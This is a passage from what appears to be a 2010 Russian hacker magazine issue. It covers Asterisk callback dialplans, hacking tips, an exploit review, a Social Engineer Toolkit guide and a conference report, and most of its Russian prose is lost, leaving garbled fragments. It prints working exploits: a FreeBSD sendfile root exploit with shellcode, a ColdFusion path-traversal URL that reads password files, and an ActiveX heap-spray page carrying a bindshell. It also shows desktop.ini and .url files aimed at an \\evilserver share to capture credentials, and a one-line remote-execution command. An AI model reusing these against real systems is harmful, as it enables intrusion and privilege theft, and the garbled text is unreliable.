exten => 310309,n,MYSQL(Query resultid ${connid}
select pin, callback from callback where
phone=${CALLERID(number)})
exten => 310309,n,MYSQL(Fetch fetchid ${resultid} pin
callback)
exten => 310309,n,NoOp(pin -> ${pin} callback# ->
${callback})
exten => 310309,n,MYSQL(Clear ${resultid})
exten => 310309,n,MYSQL(Disconnect ${connid})
exten => 310309,n,GoToIf($["${pin}" != ""]?ivrpass,s,1)
exten => 310309,n,Answer() ;

, , :
, SQL-
.
GoToIf($["${pin}" != ""]?ivr-pass,s,1). , pin ,
ivr-pass.

IVR

, .
? , PIN, , .
, ,

035

PC_ZONE

CLI ,

IVR. , , ivr-pas:
[ivr-pass]
exten => s,1,Background(WelcomePass) ;
exten =>s,n,WaitExten(10)
exten => _XXXX,1, GoToIf($["${EXTEN}" =
"${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup

GSM-
SIP, .
, VoIP-GSM ,
3G USB- HUAWEI 1550, .
callback, SMS.
, , ,
MICRO-BOX HUAWEI MODEM UNLOCKER.
.
2.6.32 .
Asterisk (www.makhutov.
org/svn/chan_datacard), 3G-.
, chan_datacard.so /usr/lib/
asterisk/modules. ? . ./trunk/
etc/datacard.conf /etc/asterisk.
[datacard0] [datacard1] , . , ,
:
[datacard0]
audio=/dev/ttyUSB1
data=/dev/ttyUSB2
context=datacard-incoming
group=1
rxgain=3
txgain=3
,
. / , SMS:
CLI>datacardsms datacard0 89000000000 Hello!
CLI>datacardussd datacard0 *102#
[datacard0] Got USSD response: ' 155.49 .
+=. ? + 5050 3'

036


call-

WelcomePass ( /var/lib/asterisk/sounds/ru).
10 .
, : exten => t,1,Hangup. PIN
, , : exten =>
i,1,Hangup. , , Hangup
PIN, . ,
, PIN-,
ivr.
[ivr]
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten
exten

=>s,1,Set (inum=0)
=>s,n,Set (tnum=0)
=> s,n,Background(Welcome)
=>s,n,WaitExten(10)
=> 1,1,GoTo(ivr-out,s,1)
=> 2,1,GoTo(ivr-ch-pin,s,1)
=> i,1,Playback(pbx-invalid)
=> i,n,Set(inum=$[${inum} + 1])
=> i,n,GotoIf($["${inum}" < "3"]?s,1)
=> i,n,Hangup()
=> t,1,Set(tnum=$[${tnum} + 1])
=> t,n,GotoIf($["${tnum}" < "3"]?s,1)
=> t,n,Hangup()

ivr inum tnum



. pbx-invalid, inum 1.
,
tnum. Welcome,
. : 1 2
PIN-:
[ivr-out]
exten => s,1,Set (inum=0)
exten => s,n,Set (tnum=0)
exten => s,n,Background(beep)
exten => s,n,WaitExten(10)
exten => 89XXXXXXXXX,1,Dial(SIP/bla1/${EXTEN}
exten => 89XXXXXXXXX ,n,Hangup
exten => 8495XXXXXXX,1,Dial(SIP/bla2/${EXTEN}
exten => 8495XXXXXXX ,n,Hangup
exten => 8[2-8]XXXXXXXXX,1,Dial(SIP/blabla3/${EXTEN}
exten => 8[2-8]XXXXXXXXX ,n,Hangup
exten => i,1,Playback(pbx-invalid)
exten => i,n,Set(inum=$[${inum} + 1])
exten => i,n,GotoIf($["${inum}" < "3"]?s,1)
exten => i,n,Hangup()
exten => t,1,Set(tnum=$[${tnum} + 1])
exten => t,n,GotoIf($["${tnum}" < "3"]?s,1)
X 10 /141/ 10

exten => t,n,Hangup()


[ivr-ch-pin]
exten => s,1,Background(beep)
exten => s,n,WaitExten(10)
exten => _XXXX,1,MYSQL(Connect connid localhost
asterisk asterisk asterisk)
exten => _XXXX,n,MYSQL(Query resultid ${connid}
update callback set `pin`=${EXTEN} where
phone=${CALLERID(number)})
exten => _XXXX,n,MYSQL(Disconnect ${connid})
exten => _XXXX,n,Hangup()
exten => i,1,Hangup()
exten => t,1,Hangup()

ivr-out . ,
. : ,
; ( VoIP-): blabla1, blabla2 blabla3.
,
VoIP-, .
ivr-ch-pin, PIN: , 10 PIN.
PIN , PIN- .

CALL- ASTERISK'

, .
, PIN-, , Asterisk .
, !
, callback- ,
. ?
call-, . :
Channel: SIP/blabla1/8901234567
MaxRetries: 2
RetryTime: 3
WaitTime: 20
Context: ivr-pass
Extension: s
Priority: 2
Archive: Yes

... :
Channel , ;
MaxRetries .
, ;
RetryTime ;
WaitTime ,
, ;
Context ,
;
Extension ivr-pass, ,
( s);
Priority s,
( 2)
Archive Yes, call-
/var/spool/asterisk/outgoing_done
.
/var/spool/asterisk/outgoing/,
8901234567 ( X 10 /141/ 10

call- , ).
20 , ,
. ,
s callback.

CALLBACK

, ,
AGI (AsteriskGatewayInterface), . Perl, PHP, C,
Bash. Bash
, :
#!/bin/bash
echo Channel: SIP/blabla1/$1 > /tmp/$2
echoMaxRetries: 2 >> /tmp/$2
echoRetryTime: 3 >> /tmp/$2
echoWaitTime: 20 >> /tmp/$2
echo Context: ivr-pass >> /tmp/$2
echo Extension: s >> /tmp/$2
echo Priority: 2 >> /tmp/$2
echo Archive: Yes >> /tmp/$2
mv /tmp/$2 /var/spool/asterisk/outgoing

callback.agi /var/lib/asterisk/
agi-bin. : ($1 ),
, call- ($2 ).
callback, callback,
0.
PIN-.
0, . ivr-pass
callback:
[ivr-pass]
exten => s,1, GoToIf($["${callback}"! =
"0"]?callback,s,1)
exten => s,n,Background(WelcomePass) ;
exten =>s,n,WaitExten(10)
exten => _XXXX,1, GoToIf($["${EXTEN}" =
"${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup
[callback]
exten => s,1,AGI(callback.agi,${callback},${UNIQUEID})
exten =>s,n,hangup

[callback] callback.
agi : UNIQUEID call-. .

callback-.
: ,
.
CallerID, VoIP-. , VoIP, ( )
CallerID. . sim-dialer

20-25 . :).
,
callback . :)z

037


GreenDog agrrrdog@gmail.com

Easy Hack
1

:

:

, ( )
.
, .
. -,
, . , ...
-. - ,
:). , ,
:
, ;
;
;
;
;
;
;
, ;
:).

,
, -
. , .
. , ( , , ).
, . ,
pdf, .
pdf - .

:
IP DNS

:
, . .
, Dynamic DNS. DNS - ,
DNS . , ,
, .
(, www.no-ip.com, freedns.
afraid.org www.dyndns.com) habrahabr.ru/blogs/webdev/101336.

038

- doc-: ,
.
. / :
http://support.microsoft.com/kb/825576/ ,
, . ,
.
,
, (smartpctools.com/metadata). : (tarasco.
org/security/reversing_ole/index.html) ,
. , (,
). ,
( ).

DNS (, ) habrahabr.ru/
blogs/linux/101380. , ,
. , IP,
(reverse_tcp_dns, reverse_https MSF). IP . ,
HTTP- :
GET /nic/update?hostname=_&myip=_ip HTTP/1.0
Host: dynupdate.no-ip.com
Authorization: Basic ____base64
User-Agent: blah-blah-blah v.0.1a

, , :).
X 10 /141/ 10

:
DNS-

:
][
DNS- ( ). nbtool Ron Bowes (skullsecurity.org/wiki/index.
php/Nbtool).
(skullsecurity.org/blog/?p=433) DNS- dnsxss (
nbtool).
, , DNS, dnsxss
DNS- .
? , XSS
DNS-lookup. ,

DNS- !
,
, -. ,
, ! -, XSS ,
( )
, , -, ,
, -,
, ,
...
:).
, . DNS-
, HTML, , , . , , / , FF
HTML, IE ( :).
. , - nbtool 0.05.

: TCP/
IP.

:
. - ,
. : , , :).
TCP/IP. IP TCP( ICMP, UDP)
RFC: , , . ,
,
.
? ? ? ,
, .
.
1999-2000
(- ... , - :)),

(nmap.org/book/osdetect.html). .
- , , .
, TCP/IP- , ,

. , ,
, ,
. ,
, - . ,
, ,
, , ,
.
- p0f.
lcamtuf.coredump.cx.
, BackTrack 4. .
, 2006 .
.
:
SYN ( ) SYN-ACK;
;
X 10 /141/ 10

EttercapNG

RST ( , );
ACK ( ).
.
NAT, , .
pcap-.
, ,
.
, , p0f
.
, , ,
IP. ,
.
, p0f (-i) eth0
(-S) (-o):
p0f -i eth0 S o os.txt

pcap- RST-:
p0f -R -s test_osdetect.pcap

039

RST- pcap-

(promiscuous
mode) -p , tcpdump,
.
, p0f , ,
, . , , , .
. p0f Ettercap (ettercap.
sourceforge.net). , , .
1200 , 200 p0f.
Ettercap ( GTK, curses-):

,
/ , - , . ,
, .
, .

:
SMB relay-.
, ,
.
SMB
p0f . ?
Windows,
.

040

1)Sniff Unified sniffing


2)Start Start sniffing
3)View - Profiles

, ,
- . ,
dca.ufrn.br/~joaomedeiros/gsoc/2009/proposal/node1.html 2009
TCP ISN ( , p0f).
Nmap.

, , whois, dns lookup ..


attackvector.org/invasion-ofprivacy. . IP- ,
. . :).
, -
.
!

, ,
. Ink (), url ( ) desktop.ini ( ).
.
(TotalCommander
),
, . ,
url-.
url:
[InternetShortcut]
URL=http://www.example.com
IconFile=\\evilserver\ipc$

IconFile , ;
X 10 /141/ 10

URL , .
, url-,
,
- .
lnk . .
.
, HE-.
desktop.ini. .
,
:
IconFile , , , desktop.ini;
LocalizedResourceName ;
InfoTip desktop.ini;
desktop.ini .
desktop.ini :
[.ShellClassInfo]
desktop.ini=@\\evilserver\ipc$,-1
InfoTip=@\\evilserver\ipc$,-1
LocalizedResourceName=@\\evilserver\ipc$,-1

IconFile=\\evilserver\ipc$

, desktop.ini ,
.
:
attrib +s _

,
, . .
, .
.
(tarasco.org/security/payload/index.html), ,
html doc (ppt, xls) .
, lnk-:
payload.exe -t l -d \\evilserver\ipc$

t l lnk-;
-d .

:
WINPCAP

1)"wpcap.dll" C:\WINDOWS\system32\
2)"Packet.dll" C:\WINDOWS\system32\
3)"pthreadVC.dll" C:\WINDOWS\system32\
4)"npf.sys" C:\WINDOWS\system32\drivers\

:
, ,
. , , WinPcap . ,
XP, raw- , , -
( libpcap) WinPcap.
. Metasploit , , Win ( ).
, meterpreter icmp-,
WinPcap .
, . ,
,
. :
X 10 /141/ 10

,
, , WinPcap. , -,
, -,
npf.sys ,
.
WinPCap ( ), ,
(500 ).
,
npf.sys ,
. z

041


, Digital Security a.sintsov@dsec.ru

01


PDF- IOS

TARGETS
Apple iPhone 3/3G/3GS
Apple iPod
Apple iPad
Apple iOS 3.X/4.0.X

CVE
CVE-2010-1797

BRIEF
, . ,
, , , iPhone.
,
. SSH-,
... , , ,
. Jailbreak.
. .
( ), AppStore, .
? , Jailbreak,
- @comex (iPhone Dev Team),
0day Apple. Defcon 18. ,
0day : PDF-, ,
iOS.
iPhone . , ,
, , , ,
Apple-.

/Filter[/FlateDecode]
/Length 10709>>
stream
x}
t -ldc0!
.... ....
endstream
endobj
15 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /
Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+TimesRoman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 13 0 R
>>
endobj

,
Type1C-, , , . , 15 ,
13 (/FontFile3 13 0 R), Type1C-.
(CFF - Compact Font Format) . ,
? /Filter[/FlateDecode],
, PDFTK
( - : paehl.de/pdf/gui_pdftk.html). ,
CFF-, ( ,
CFF), , , ROP-.
,
root' (
IOSurface).
, Jailbreak-, (
iOS) . .

SOLUTION
EXPLOIT
-, , . -
PDF-:
13 0 obj
<</Subtype/Type1C

042

Jailbreak', , ,
. .
, , , .
, Jailbreak,
, PDF-
.
X 10 /141/ 10

iPhone. PDF

EXPLOIT
iPhone Jailbreak

02


FREEBSD

TARGETS
FreeBSD 7.x
FreeBSD 8.x

CVE

? sendfile() mbuf-
.
, .
,
mbuf-
, ,
( ). sendfile(), mbuf.
, ,
( ). ,
/bin/sh, , root.
( x64 x32,
x32):

CVE-2010-2693

BRIEF
FreeBSD Ming Fu. root
. Kingcope ,
. ,
.
(FreeBSD)
mbuf. , , ,
.
sendfile()
( ) . ,
. , ,
mbuf.
mbuf,
sendfile(). ...
X 10 /141/ 10

main (int argc, char *argv[])


{
int s, f, k2;
struct sockaddr_in addr;
int flags;
// /tmp/sh root sticky bit
// ,
// ,
char str32[]=
"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

char buf[10000];

043

Kingcope FreeBSD

size = sb.st_size;
chunk = 0;

iPhone. URL,

char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
// loopback
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("fail to connect");
// /bin/sh
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("fail to open file");

//
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
// sendfile()
while (size > 0)
{
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0)
{
sbytes = 0;
if (arch == 1)
n = sendfile(f,s,2048*2,chunk,NULL,&sbytes,0);
if (arch == 2)
n = sendfile(f,s,1204*6,chunk,NULL,&sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;

n = fstat(f, &sb);
if (n<0)
warn("fstat failed");

044

memset(buf, '\0', sizeof buf);


if (arch == 1)
{
X 10 /141/ 10

ColdFusion

//nop
for (k2=0;k2<256;k2++)
{
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
// nop
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
//
// sendfile
// mbuf
// ,
// - /bin/sh
write(s, p, n);
}
}

, /bin/sh tmp:
cp /bin/sh /tmp/sh
cp /bin/sh /tmp/sh2

(ALT+F2) netcat, ,
...
nc -l 7030

:
gcc cache.c -o cache
./cache i386

. , ,
- /bin/sh,
/tmp/sh /tmp/sh2. /
tmp/sh, root.
X 10 /141/ 10

ColdFusion

SOLUTION
, , , M_RDONLY.
======================================================
--- sys/kern/uipc_mbuf.c
(revision 209948)
+++ sys/kern/uipc_mbuf.c
(working copy)
@@ -302,6 +302,7 @@
n->m_ext.ref_cnt = m->m_ext.ref_cnt;
n->m_ext.ext_type = m->m_ext.ext_type;
n->m_flags |= M_EXT;
+
n->m_flags |= m->m_flags & M_RDONLY;
}
/*

04


COLDFUSION
TARGETS X

ColdFusion 9
ColdFusion 8
ColdFusion 7

CVE
CVE-2010-2861
BRIEF
ColdFusion Web. , , . ,
, . ColdFusion,

. (Richard Brain), Adobe.
, ,
.

EXPLOIT
, , , :

045

http://server/CFIDE/administrator/enter.cfm?locale=ru

.
ru , , , .
../.
, ColdFusion ,
.
en ( ).
en,
. , , ? , ,
, ,
C:/ColdFusionX/lib/password.properties.
, :
http://server/CFIDE/administrator/enter.cfm?locale=..
/../../../../../../../../../ColdFusion8/lib/password.
properties%00en

SHA1- . ,
, ,
(Niels Teusink):
1. (/CFIDE/
administrator/enter.cfm),
;
2. javascript:hex_hmac_
sha1(document.loginform.salt.value,document.loginform.
cfadminPassword.value), Enter. ;
3. ;
4. MITM-, Burp,
TamperData- FireFox;
5. Login;
6. Post-
cfadminPassword, .
;
7. !

;
, ,
ColdFusion, , , (
SYSTEM). , , .

SOLUTION
, ,
.
. , Adobe hotfix, : adobe.com/support/security/bulletins/apsb10-18.html

05


FATHFTP

- FTP
HTML, ActiveX-.
, , . ,
,
.

EXPLOIT
, , , SEH. ,
, - , , ,
. . , ,
, - .
- . ( , ). ,
, ,
- . ,
, .
, , , . , , ,
.
ASCI-, , ,
. 10
, Heap Spray ( ) SEH . Heap Spray,
, , 0x0C0C0C0C.
, Heap Spray ,
.
. ,
,
(, nop ,
). : nop
( 0x90). 28876
. FathFTP.
1540 . , , 0x0C.
FileExists(),
0x0C.
, ,
1540 .
, , ,
. SEH-
0x0C0C0C0C.
, .
,
SEH-. ,
0x0C0C0C0C.
,
(Heap Spray). .
0x90 ,
. :

TARGETS
FathFTP 1.8

CVE
N/A

<html>
//CLSID FathFTP
<object classid='clsid:62A989CE-D39A-11D5-86F0B9C370762176' id='target'></object>
<script>

BRIEF
FathFTP 79 , FTP- . -

046
46

// Skyland win32 bindshell 28876


TCP- cmd.exe
X 10 /141/ 10

var shell = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b


3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348
b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df
%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%
u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u
1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7
768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc5
89%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7da
b%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6
%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%
uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u
ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u1
06a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53
db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec
0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0
%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%
ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u
5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uf
fff%uc483%u615c%u89eb");
// heap-spray, 90 nop
var bigbk=unescape("%u9090%u9090");
var header=20;
var space=header+shell.length;
X 10 /141/ 10

while(bigbk.length < space) bigbk+=bigbk;


var fillbk=bigbk.substring(0,space);
var bk=bigbk.substring(0,bigbk.length-space);
while(bk.length+space<0x40000) bk= bk+bk+fillbk;
var mem=new Array();
//
for(i=0; i<800;i++) mem[i]=bk+shell;
var buff="";
// 0x0C
for(i=0; i<1540;i++) buff+=unescape("%0c%0c%0c%0c");
//
target.FileExists(buff);
</script>
</html>

SOLUTION
. - ,
, Kill bit. Kill bit , , , .
, HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Internet Explorer\ActiveX Compatibility\,
62A989CE-D39A-11D5-86F0-B9C370762176 Compatibility
Flags, REG_DWORD, 0x00000400. z

047


D1g1 dsecrg.com

,

()

SET
, , ,
,
, . . ,
,
. ,
. . ...
vulnerability...
INTRODUCTION

.
, .
.
, .
,
, ,
, . ,
, PSYCHO,
,
.

048

IT IS BEATIFUL S.E.T.

. Social Engineer
Toolkit (SET), David
Kennedy (ReL1K), GPLv2.
toolkit ,
BackTrack,
. () SET
:
svn co http://svn.thepentest.com/social_engineering_
toolkit /pentest/exploits/SET
X 10 /141/ 10

www.social-engineer.org
SET , Python
,
. ,
.
,
( :)). , Python, SET ,
: Metasploit, ettercap, sendmail, apache
. , , ,
. SET
, . toolkit
, :
/pentest/exploits/SET/config/set_config

set_config ,
SET ( ).
, open-source, , - (0-day ), .
SET,
.
, SET
:
SET
E-MAIL ATTACK VECTOR
WEB ATTACK VECTOR
CD/DVD/USB ATTACK VECTOR
Teensy USB HID ATTACK VECTOR

-mail , file format, :


Adobe Flash Player 'newfunction' Invalid Pointer Use
X 09 /140/ 10

SET Nokia N900

Adobe Collab.collectEmailInfo Buffer Overflow


Adobe Collab.getIcon Buffer Overflow
Adobe JBIG2Decode Memory Corruption Exploit
Adobe PDF Embedded EXE Social Engineering

-, , , :

LNK Code Execution (MS10-046)


Help Center XSS and Command Execution (MS10-042)
IE iepeers.dll Use After Free (MS10-018)
IE Tabular Data Control Exploit (MS10-018)
IE "Aurora" Memory Corruption (MS10-002)

049


.
, /pentest/exploits/SET/config/mailing_list.
txt. . ,
,
. ,
:
Gmail-
Sendmail open-relay
- open-relay

Java Required
metasploit,
SET metasploit.
SET ,

Metasploit.
, ,
...

E-MAIL ATTACK VECTOR

email- .
Spear-Phishing Attack Vectors.
,
- . , .
, SET :

Social Engineering CTF


,
DEFCON 18 Riviera Hotel & Casino Las Vegas, Nevada. Social-Engineer.Org Offensive
Security. , , , .
,
, . ,
CTF, , .
: - , , , , ,
, ,
, .
URL. ,
, Google, BP, McAfee, Symantec, Shell, Microsoft,
Oracle, Cisco, Apple Walmart. , , :).
Digital Defense,
Warning Regarding DEF CON 18 Social Engineering Contest,

.

050

, :
Gmail-, SET, Sendmail, SET BackTrack,
, open-relay .
, SMTP- open-relay, NSE- Nmap:
nmap --script smtp-open-relay.nse <host>

pen-relay ,
, reverse
lookups,
.
(Meterpreter Reverse_TCP, Reverse VNC, Reverse TCP
Shell) metasploit
PDF-,
SET, PDF-.
listener , .

WEB ATTACK VECTOR

, , .
, ( ), -
-.
, ,
, , .

metasploit-fakeUpdate
g0tmi1k ,
bash- metasploit-fakeUpdate, ,
patch ( Linux, OSX, Windows), .
DHCP -, DNSSpoof
ARPSPoof, -
,
. ,
. , .
meterpreter SBD (Secure BackDoor) VNC, , , ,
backdoor. sniffer dnsiff, , .
,
BackTrack.

X 10 /141/ 10

HTTP://WWW
links

Teensy USB HID


, SET
ettercap, , ARP-spoofing.

. ,
.
XSS, email-,
... ,
. ,
,
. URL,
www.bit.ly (
). ,
,

/pentest/exploits/SET/src/program_
junk/<name_file>.pdf.

, SET
, :

Gmail, Google, Facebook, Twitter


Java Required

-, ,
Java Required,
, Java, ,
.
Java Applet, .

- .
toolkit URL,
.
-.
,
, .
- ,
404, ,
...,
,
IE. ,
.
, , web-attack
The Java Applet . Java Applet Java
Certificate, , ,
X 10 /141/ 10

metasploit payload.
, ,
, ,
Java. Java Applet
Thomas Werth.
, ,
, The Metasploit Browser
Exploit Method. SET
, .
IE ( ,
), ,
, IE , .
Credential Harvester ,
,
,
.
.
: , -
..

, ,
ICQ, Skype, Jabber e-mail.
Tabnabbing-.
,
Please wait while the site loads..., ,
,
,
, . ,
, , ,
(
). Credential Harvester. ,
SET 0.6.1, SSL (
, ).
.
Man Left in the Middle Attack toolkit
HTTP REFERER
,
. ,
, XSS ,
, . ,
XSS
Credential Harvester profit.

secmaniac.com
David Kennedy (ReL1K),
Social-Engineering
Toolkit (SET)
offensive-security.
com/metasploitunleashed/SocialEngineering-Toolkit
Metasploit
Unleashed
SET
social-engineer.org
Exploiting
Human Vulnerabilities
g0tmi1k.blogspot.
com/2010/05/scriptvideo-metasploitfakeupdate-v011.html

g0tmi1k,
metasploitfakeUpdate

INFO
info


SET

v0.6.1
Open-relay




.

WARNING
warning
!


!
,


!

051

mfu

CD/DVD/USB ATTACK VECTOR

,
LNK- ,
. SET
.
Infectious Media Generator,
payload, Encoder,
( AV bypass) reverse-connect.
SET autorun
: program.exe ( payload) autorun.inf,
program.exe. CD/DVD/USB
.

TEENSY USB HID ATTACK VECTOR

IronGeek WinFang SET


, Teensy USB HID (human interface device). ,
, . Teensy
mini-USB
. Teensy USB AVR- 16 , - 32-128 , RAM- 2,5-8
$18-27, .
,
USB-, ,
..
,
, ,
.
,
. ,
, USB U3
. ,
pde- Teensy. SET,

052

,
mfu
teensy.pde,
Arduino IDE Teensy Loader USB .
, Powershell
HTTP GET MSF, WSCRIPT HTTP GET MSF Powershell based Reverse
Shell. ,
payload C Arduino IDE, USB HID out of the box! 007 (
, ) , own' .

CONCLUSION

, , .
, .
, .
, , ... z
X 10 /141/ 10


"sh2kerr"

HITB


Hack In The Box. , ,
, ... ,
, ,
.
!

, , , ,
, Hack In The box . ,
( ) , ,
, , - , ,
, ,
,
, . ,
,
(
Fsecure, T2 ), , - .
,
,
, , , . ,
(, -, ) ,
, .

054

, , ,
, , ,
. , ,
,
.
, ( ,
Qualys), Laurent Outdot ( TETHRI Security),
( , 2000-
, XProbe), Saomuil Shah ( NetSquare) ,
, DSecRG. , ,
.

, ,
PCI DSS -.
.
, , ,
: Compliance First Security First.
, ,
X-Probe , , ,
, ,
, , . , ,
X 10 /141/ 10

, Afterparty HITB
, , , .
, ,
ERP SAP, ,
SAP ,
sapsploit. BBC Radio1 ERP,
.
XprobeNG. , , , . XProbe
,
,
Nmap ( ,
). , :
1. , ,
, , ,
, , ,
,
;
2.
;
3. IPv6;
4. ,
.
, ,
, .
, http://xprobe.sourceforge.net.
, ,
, JitSpray, , , Flash,
JIT-. ,
( :) JIT-
Apple Safari.
. ,
X 09 /140/ 10

,

.
, ,
How to rate the security of closed source software,
, Michael Thumann ERNW.
Troopers,
. : ,

. , , . :
?
, , - ,
, . ? ,
Thumanns
Trustworthiness Index. ,
. :
DEP ();
ASLR ();

055

SafeSEH ();
();
, /GS
( );
, ( );
(
);
( );
( );
( );
( );
.

, ,

.
, ,
.
Firefox.

DEP ASLR, . , ,
,
, , ,
. , , , , , ,
.

, ,
kane-box,
, John Kanen Flowers.
, ,
IDS/IPS, . , , OpenSource,
, . -,
open source hardware
. ,
,
, , . kane-box,
, Cisco PIX ( ).
$250 ( WiFi $300),
.
.
, ,

056

Microsoft

))

:
, , ,

PCI DSS, . , elite
,
,
/ $1250. , , .
.
,
. , , ,
, ,
.
, .
, , ,
.
, 16 . , , ,

X 10 /141/ 10

Appprint,
web2.0
, , . , ,
, ? :) , ,
. .

WEB IN THE MIDDLE


wsscan
nCircle
Ncircle Suite 360.
. , ,
kane-box.com.

Niels Teusink ( , )
Hacking Wireless Presenters. -,
, , ,
,
. , , , ,
. , :
[Win+R]
cmd /c net use x: http://10.1.1.1/x&x:x
[Enter]

, Web in The Middle, Laurent


Oudot Tehtri Security.
, ,
HTTP-.
: , . , ,
. ,
- -,
SSL. ,
, . Mozilla

, , , ,
Tamperdata:
http://live.mozillamessaging.com/%APP%/
whatsnew?locale=%LOCALE%&version=%VERSION
%&os=%OS%&buildid=%APPBUILDID%

Thunderbird :
http://live.mozillamessaging.com/thunderbird/start?
locale=en&version=3.0.4&os=Darwin&buildi
d=20100317134139

Apple iWork iLife:



,
.
. ,
X 10 /141/ 10

apple.com/welcomescreen/ilife09/iphoto/
apple.com/welcomescreen/iwork09/numbers/
apple.com/welcomescreen/iwork09/keynote/

057


RAZ0R HTTP://RAZ0R.NAME

Jit spray !, , ?

apple.com/welcomescreen/iwork09/pages/
"GET /welcomescreen/iwork09/pages HTTP/1.1
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3;
en-us)
AppleWebKit/533.16 (KHTML, like Geck

,
. ,
ISR-evilgrade (infobyte.com.ar/down/isr-evilgrade-Readme.txt),
Infobyte Security Research. :

Java plugin;
Winzip;
Winamp;
MacOS;
OpenOffices;
iTunes;
Linkedin Toolbar;
DAP [Download Accelerator];
Notepad++;
speedbit.

API .
, - ,
, ,
. ,
, , , , .

Firefox eff.org/https-everywhere. 0-day , , Iphone, HTC, Blackberry , , IPad.
Safari Ipad Ipad. ,
0-day .

WEB 2.0

, ,
. - ,
, ,
Shreeraj Shah, BlueInfy,

058

s tticheck
firefox
Web 2.0. , , ,
, . ,
Web 2.0 2010 :
1.Dom based XSS Ajax;
2.SQL injection SOAP & XML;
3.Blind SQL over JSON;
4.Auth Bypass-XPATH and LDAP;
5.Business Logic Bypass;
6.Decompilation Attack and Info Leakage;
7.WSDL scanning and API exposure Cloud;
8.XSS with Flash;
9.CSRF with XML;
10.Widgets/Mashup Exploitation.

.
1. DOM.
, Web 2.0 Ajax- ,
JavaScript-:
document.write()
document.writeln()
document.body.innerHtml=
document.forms[0].action=
document.attachEvent()
document.create()
document.execCommand()
document.body.
window.attachEvent()
document.location=
document.location.hostname=
document.location.replace()
document.location.assign()
X 10 /141/ 10

document.URL=
window.navigate()

-, , , DOMScan,
Dom-based XSS
- , , .
, blueinfy.
com/DOMScan.zip .
2. X-Path.
SQL- ,
, SQL, Xpath
. , , , -
, , ,
, SQL-. , :
string credential =
"//users[@username='"+user+"' and
@password='"+pass+"']";

' or 1=1 or ''=,


, ,
.
3. XSS Flash. SWF-,
, SWF decompiller.
? , , ,
. ,
:
on (release) {
getURL (_root.clickTAG, "_blank");
}

clickTAG,
. ,
http://url/to/flash-file.swf?clickTAG=javascript:
alert('xss')

:
on (release) {
if (_root.clickTAG.substring(0,5)== "http:" || _root.
clickTAG.substring(0,6)== "https:" || _root.clickTAG.
substring(0,1)== "/") {
getURL (_root.clickTAG, "_blank");
}
}


:
OWASP Flash Security Project
Blinded by flash (slides as pdf) by Prajakta Jagdalen Blackhat DC
2009
Neat, New, and Ridiculous Flash Hacks by Mike Bailey Blackhat
DC 2010
A Lazy Pen Tester's Guide to Testing Flash Applications
4. WSDL Scanning. WSDL. Web Service Discovery Language
-, XML.
XML- , XML-,
, , , . ,
. -
X 10 /141/ 10

, :
Inurl:wsdl
Inurl:asmx

wsScanner,
XML-,
, , , , , -.
, ; , .
5. CSRF with XML. CSRF,
(, CSFU Cross
site file upload ). , , GET/
POST-, ,
, . ,
, XML-, SRF, XML- . : pentestmonkey.net/
blog/csrf-xml-post-request.

Web 2.0 :
DOMScan (Beta) DOM-
XSS-,
.
DOMTracer (Beta) Firefox,
DOM Web 2.0 .
Binging(Beta)
( ). API Bing.
Web2Fuzz (Beta) , JSON XML-.
Web2Proxy (Beta) , , Web 2.0
.
AppPrint (Beta) ,
, . , ,
Vkontakte.ru, : - nginx/0.7.59 Microsoft-IIS/7.0, Web
